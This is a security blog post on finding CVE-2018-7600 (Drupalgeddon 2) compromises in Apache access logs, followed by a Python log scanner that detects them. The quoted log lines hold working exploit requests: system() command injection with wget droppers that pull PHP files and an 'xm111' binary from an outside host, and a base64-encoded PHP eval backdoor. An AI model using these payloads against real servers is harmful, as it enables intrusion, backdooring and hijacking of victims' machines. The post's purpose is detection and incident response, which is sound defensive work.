Searching for Drupal CVE-2018-7600 Compromises

If you haven't heard the news, the Drupal core team released a critical patch (SA-CORE-2018-002) back in March to close a remote code execution vulnerability, CVE-2018-7600, affecting Drupal 7 and 8. The bug lets an unauthenticated request inject render-array keys (the `#`-prefixed ones, which show up URL-encoded as `%23` in the logs below) through the Form API, so a PHP callback such as `system` gets called with an attacker-supplied argument. In early April mass scanning started and proof-of-concept exploits became available. At this point, if you have not patched your Drupal install there is a high probability that you have been compromised.

The scans probing for possible targets look like the following. This one hits the Drupal 8 Form API AJAX path; the giveaway is the `#` inside `element_parents` (`account/mail/%23value`), since `_wrapper_format=drupal_ajax` on its own is ordinary Drupal 8 traffic. The command for this vector travels in the POST body, so the access log only shows the probe, not the payload:

93.56.61.232 - - [17/Apr/2018:04:35:27 -0400] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 404 13074 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"

Now we have some data on what a successful compromise looks like. These requests use the Drupal 7 vector: `name[#post_render][]=system` selects PHP's `system()` as the render callback and `name[#markup]` carries its argument, i.e. the shell command. The sequence is `pwd` to find the docroot, then a dropper that fetches a PHP file into `/tmp`, `chmod 777`s it, rewrites the `ptptpt` placeholder to the site's webroot with `sed`, runs it and deletes it, and finally an `xm111` binary with a `config.json` that is left running in the background. Note the spoofed WordPress referer (`wp-admin/admin-ajax.php`) and the return visit two days later on the 20th:

185.212.128.77 - - [18/Apr/2018:13:48:51 -0400] "POST /user/password?name[%23post_render][]=system&name[%23markup]=pwd HTTP/1.1" 200 8308 "http://example.com/wp-admin/admin-ajax.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36"
185.212.128.77 - - [18/Apr/2018:13:48:53 -0400] "POST /user/password?name[%23post_render][]=system&name[%23markup]=wget+-O+/tmp/l.php+http://193.201.224.233/l.txt?l1;chmod+777+/tmp/l.php;sed+-i+'s/ptptpt/\"\\/home\\/example\\/public_html\"/g'+/tmp/l.php;php+-f+/tmp/l.php > /dev/null 2>&1 &;rm+-f+/tmp/l.php; HTTP/1.1" 200 8835 "http://example.com/wp-admin/admin-ajax.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36"
185.212.128.77 - - [18/Apr/2018:13:49:16 -0400] "POST /user/password?name[%23post_render][]=system&name[%23markup]=pwd HTTP/1.1" 200 8308 "http://example.com/wp-admin/admin-ajax.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36"
185.212.128.77 - - [18/Apr/2018:13:49:18 -0400] "POST /user/password?name[%23post_render][]=system&name[%23markup]=wget+-O+/tmp/m.php+http://193.201.224.233/m.txt?l1;chmod+777+/tmp/m.php;sed+-i+'s/ptptpt/\"\\/home\\/example\\/public_html\"/g'+/tmp/m.php;php+-f+/tmp/m.php > /dev/null 2>&1 &;rm+-f+/tmp/m.php; HTTP/1.1" 200 8835 "http://example.com/wp-admin/admin-ajax.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36"
185.212.128.77 - - [18/Apr/2018:13:49:33 -0400] "POST /user/password?name[%23post_render][]=system&name[%23markup]=cd+/tmp;wget+-O+xm111+http://193.201.224.233/xm111;chmod+777+xm111;wget+-O+config.json+http://193.201.224.233/m.json;chmod+777+config.json;./xm111 > /dev/null 2>&1 & HTTP/1.1" 200 8745 "http://example.com/wp-admin/admin-ajax.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36"
185.212.128.77 - - [20/Apr/2018:06:10:54 -0400] "POST /user/password?name[%23post_render][]=system&name[%23markup]=pwd HTTP/1.1" 200 8308 "http://example.com/wp-admin/admin-ajax.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36"
185.212.128.77 - - [20/Apr/2018:06:10:55 -0400] "POST /user/password?name[%23post_render][]=system&name[%23markup]=wget+-O+/tmp/l.php+http://193.201.224.233/l.txt?l1;chmod+777+/tmp/l.php;sed+-i+'s/ptptpt/\"\\/home\\/example\\/public_html\"/g'+/tmp/l.php;php+-f+/tmp/l.php > /dev/null 2>&1 &;rm+-f+/tmp/l.php; HTTP/1.1" 200 8835 "http://example.com/wp-admin/admin-ajax.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36"
185.212.128.77 - - [20/Apr/2018:06:11:20 -0400] "POST /user/password?name[%23post_render][]=system&name[%23markup]=pwd HTTP/1.1" 200 8308 "http://example.com/wp-admin/admin-ajax.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36"
185.212.128.77 - - [20/Apr/2018:06:11:21 -0400] "POST /user/password?name[%23post_render][]=system&name[%23markup]=wget+-O+/tmp/m.php+http://193.201.224.233/m.txt?l1;chmod+777+/tmp/m.php;sed+-i+'s/ptptpt/\"\\/home\\/example\\/public_html\"/g'+/tmp/m.php;php+-f+/tmp/m.php > /dev/null 2>&1 &;rm+-f+/tmp/m.php; HTTP/1.1" 200 8835 "http://example.com/wp-admin/admin-ajax.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36"

In these logs you can see the commands being entered into the exploit in the clear. Other times the command injection is obfuscated. In the request below the payload is a base64 blob piped through `base64 --decode | tee accesson.php`, which drops a file in the PHP process's working directory, normally the Drupal docroot. Decoding the blob gives a small PHP backdoor: it echoes a fixed arithmetic result (`7457737+736723`) so the attacker can confirm from the response that the file executes, then `eval()`s data taken from `$_POST` and handles a `$_FILES` upload, with the variable and parameter names assembled from `chr()` and `base64_decode()` calls to frustrate simple signature matching:

82.209.182.92 - - [19/Apr/2018:03:29:35 -0400] "POST /user/password?name[%23post_render][0]=system&name%5B%23markup%5D=echo+PD9waHAgZWNobyA3NDU3NzM3KzczNjcyMzskcmFQb19yWmx1b0U9YmFzZTY0X2RlY29kZSgiWSIuY2hyKDEwOSkuIkYiLmNocigxMjIpLmNocig5MCkuIlQiLmNocig4OSkuY2hyKDQ4KS5jaHIoODgpLiIyIi4iUiIuImwiLiJZIi5jaHIoNTApLiI5Ii5jaHIoMTA3KS4iWiIuY2hyKDgxKS4iPSIuIj0iKTskeWRTSlB0bndyU3Y9YmFzZTY0X2RlY29kZShjaHIoODkpLiIyIi5jaHIoNTcpLmNocigxMTkpLmNocigxMDEpLmNocig4MSkuY2hyKDYxKS4iPSIpO2V2YWwoJHJhUG9fclpsdW9FKCRfUE9TVFtiYXNlNjRfZGVjb2RlKGNocig5NykuY2hyKDg3KS4iUSIuY2hyKDYxKSldKSk7aWYoJF9QT1NUW2Jhc2U2NF9kZWNvZGUoImQiLmNocig4OCkuY2hyKDY1KS4iPSIpXSA9PSBiYXNlNjRfZGVjb2RlKCJkIi4iWCIuY2hyKDY1KS5jaHIoNjEpKSl7QCR5ZFNKUHRud3JTdigkX0ZJTEVTW2Jhc2U2NF9kZWNvZGUoY2hyKDkwKS4ibSIuImwiLiJzIi5jaHIoOTApLiJRIi4iPSIuY2hyKDYxKSldW2Jhc2U2NF9kZWNvZGUoY2hyKDEwMCkuY2hyKDcxKS5jaHIoNDkpLiJ3Ii4iWCIuY2hyKDUwKS4iNSIuY2hyKDEwNCkuImIiLmNocig4NykuIlUiLmNocig2MSkpXSwkX0ZJTEVTW2Jhc2U2NF9kZWNvZGUoIloiLmNocigxMDkpLiJsIi4icyIuY2hyKDkwKS4iUSIuY2hyKDYxKS5jaHIoNjEpKV1bYmFzZTY0X2RlY29kZShjaHIoOTgpLiJtIi4iRiIuY2hyKDExNikuIloiLmNocig4MSkuY2hyKDYxKS4iPSIpXSk7fTsgPz4%3D%7C+base64+--decode%7C+tee+accesson.php HTTP/1.1" 200 16453 "http://example.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2788.88 Safari/537.36"
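As an added example (this is not the drupal-check script and not code from the original post), here is a Python scanner that applies the indicators above to Apache combined-format logs: it URL-decodes each request target, flags the Drupal 8 AJAX probe and the Drupal 7 render-array vector, pulls out the injected command and any download URLs, and decodes `echo <b64> | base64 --decode | tee <file>` droppers. The sample log is constructed from trimmed copies of the entries above plus a harmless base64 payload; the IPs, hosts and file names in it are as they appear in those entries and have not been verified.

```python
"""Added example: scan an Apache access log for CVE-2018-7600 exploitation indicators.

Illustrative code written for this page, not the drupal-check.sh script. SAMPLE_LOG is
constructed: trimmed copies of the log lines on the page plus a harmless base64 payload.
"""
import base64
import binascii
import re
import urllib.parse
from typing import List, Optional

# Apache "combined" format. The request target is taken non-greedily up to " HTTP/x.y"
# because these attackers leave raw spaces and shell metacharacters in the query string.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<request>.*?) HTTP/[0-9.]+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Form API render-array callbacks abused by the vulnerability (after decoding '%23' -> '#').
RENDER_KEYS = ("#post_render", "#pre_render", "#lazy_builder", "#access_callback")

# Drupal 8 probe: '_wrapper_format=drupal_ajax' alone is ordinary Drupal 8 AJAX traffic,
# so also require an element_parents value that reaches into a render array ('#').
D8_PROBE_RE = re.compile(r"element_parents=[^&]*#.*_wrapper_format=drupal_ajax", re.S)

# Injected shell command: everything after '[#markup]='. It is the last parameter in these
# payloads and may itself contain '&' (e.g. '2>&1 &'), so do not split on '&'.
MARKUP_RE = re.compile(r"\[#markup\]=(?P<cmd>.*)$", re.S)
B64_RE = re.compile(
    r"echo\s+(?P<b64>[A-Za-z0-9+/=]+)\s*\|\s*base64\s+(?:-d|--decode)\b"
    r"(?:\s*\|\s*tee\s+(?P<dest>\S+))?"
)
URL_RE = re.compile(r"https?://[^\s;'\"]+")

SAMPLE_LOG = r"""
10.0.0.5 - - [17/Apr/2018:04:00:00 -0400] "GET /node/1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
93.56.61.232 - - [17/Apr/2018:04:35:27 -0400] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 404 13074 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
185.212.128.77 - - [18/Apr/2018:13:48:51 -0400] "POST /user/password?name[%23post_render][]=system&name[%23markup]=pwd HTTP/1.1" 200 8308 "http://example.com/wp-admin/admin-ajax.php" "Mozilla/5.0"
185.212.128.77 - - [18/Apr/2018:13:48:53 -0400] "POST /user/password?name[%23post_render][]=system&name[%23markup]=wget+-O+/tmp/l.php+http://193.201.224.233/l.txt?l1;chmod+777+/tmp/l.php;php+-f+/tmp/l.php > /dev/null 2>&1 &;rm+-f+/tmp/l.php; HTTP/1.1" 200 8835 "http://example.com/wp-admin/admin-ajax.php" "Mozilla/5.0"
82.209.182.92 - - [19/Apr/2018:03:29:35 -0400] "POST /user/password?name[%23post_render][0]=system&name%5B%23markup%5D=echo+PD9waHAgZWNobyAxKzE7ID8%2B%7C+base64+--decode%7C+tee+accesson.php HTTP/1.1" 200 16453 "http://example.com/" "Mozilla/5.0"
"""


def decode_b64(blob: str) -> str:
    """Decode a base64 blob leniently (droppers sometimes omit the '=' padding)."""
    padded = blob + "=" * (-len(blob) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return ""


def analyze_request(request: str) -> Optional[dict]:
    """Classify one request target; returns None when no indicator is present."""
    decoded = urllib.parse.unquote_plus(request)
    keys = [k for k in RENDER_KEYS if k in decoded]
    if D8_PROBE_RE.search(decoded):
        vector = "drupal8-ajax-probe"      # command is in the POST body, not in the URL
    elif keys:
        vector = "drupal7-render-array"
    else:
        return None
    finding = {"vector": vector, "keys": keys, "command": "",
               "urls": [], "dropped": "", "payload": ""}
    m = MARKUP_RE.search(decoded)
    if m:
        cmd = m.group("cmd").strip()
        finding["command"] = cmd
        finding["urls"] = URL_RE.findall(cmd)        # second-stage download locations
        b = B64_RE.search(cmd)
        if b:                                        # base64 dropper: recover the file
            finding["payload"] = decode_b64(b.group("b64"))
            finding["dropped"] = b.group("dest") or ""
    return finding


def scan_log(text: str) -> List[dict]:
    """One finding per log line that matches a CVE-2018-7600 indicator, in log order."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        f = analyze_request(m.group("request"))
        if f:
            f.update(ip=m.group("ip"), time=m.group("time"), status=int(m.group("status")))
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["ip"], f["status"], f["vector"], f["command"] or "-")
        for url in f["urls"]:
            print("    fetches:", url)
        if f["payload"]:
            print("    drops", f["dropped"] or "(stdout)", "containing:", f["payload"])
```

A hit is a trigger, not proof of execution: the Drupal 8 probe above returned a 404 and still counts, and a 200 on the Drupal 7 vector only tells you the request was served. Use the file names and URLs the scanner pulls out of the command (the `/tmp` droppers, `accesson.php` in the docroot, the `xm111` binary) as the list of things to go and look for on disk and in the process table.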

Based on the indicators in this style of command injection, I've whipped up a quick tool to dig through the Apache logs and present the relevant information:

https://github.com/Hestat/drupal-check

Feel free to clone it from GitHub or:

wget https://raw.githubusercontent.com/Hestat/drupal-check/master/drupal-check.sh

It is currently configured for cPanel setups or vanilla Apache installs. Have questions or data you'd like to share based on your logs? Find me on Twitter @laskow26